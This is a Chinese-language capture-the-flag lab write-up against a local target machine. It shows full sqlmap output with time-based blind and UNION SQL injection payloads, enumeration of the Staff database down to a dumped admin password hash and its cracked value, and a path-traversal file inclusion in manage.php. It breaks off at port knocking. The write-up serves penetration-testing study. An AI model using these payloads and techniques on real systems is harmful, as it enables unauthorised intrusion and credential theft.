1、信息收集
使用
netdiscover
发现靶机 ip:192.168.57.155使用
nmap
发现仅开放80
端口
1.1、尝试注入
访问页面后,发现
search
疑似存在SQL注入使用
nmap
测试
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 5475 FROM (SELECT(SLEEP(5)))MxJV) AND 'gVrp'='gVrp
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a627a71,0x6c484546517947656370474f4b4c6247686350424b51
785975636b79527374735a4366546f477557,0x716b7a7a71),NULL,NULL-- -
---
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
available databases [3]:
[*] information_schema
[*] Staff
[*] users
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 5475 FROM (SELECT(SLEEP(5)))MxJV) AND 'gVrp'='gVrp
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a627a71,0x6c484546517947656370474f4b4c6247686350424b51
785975636b79527374735a4366546f477557,0x716b7a7a71),NULL,NULL-- -
---
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users |
+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 5475 FROM (SELECT(SLEEP(5)))MxJV) AND 'gVrp'='gVrp
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a627a71,0x6c484546517947656370474f4b4c6247686350424b51
785975636b79527374735a4366546f477557,0x716b7a7a71),NULL,NULL-- -
---
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
Database: Staff
Table: Users
[3 columns]
+----------+-----------------+
| Column | Type |
+----------+-----------------+
| Password | varchar(255) |
| UserID | int(6) unsigned |
| Username | varchar(255) |
+----------+-----------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 5475 FROM (SELECT(SLEEP(5)))MxJV) AND 'gVrp'='gVrp
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a627a71,0x6c484546517947656370474f4b4c6247686350424b51
785975636b79527374735a4366546f477557,0x716b7a7a71),NULL,NULL-- -
---
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 5475 FROM (SELECT(SLEEP(5)))MxJV) AND 'gVrp'='gVrp
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a627a71,0x6c484546517947656370474f4b4c6247686350424b51
785975636b79527374735a4366546f477557,0x716b7a7a71),NULL,NULL-- -
---
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
Database: Staff
Table: Users
[1 entry]
# 获取到当前CMS的管理员账号,在线查询后为:transorbital1
+----------+----------------------------------+
| Username | Password |
+----------+----------------------------------+
| admin | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+
cms 用户已获取到,登陆后,发现疑似存在文件包含漏洞
1.2、文件包含fuzz
192.168.57.155/manage.php?a=../../../../..b
# 使用burp对a和b进行变量替换,fuzz发现存在文件包含漏洞,可以读取`passwd`文件,但不能读取`shadow`
# 存在knockd.conf文件
1.3、knockd利用
knockd
是一个敲门程序,只有用户按照顺序访问对个端口后,对应对隐藏的端口才会重新开放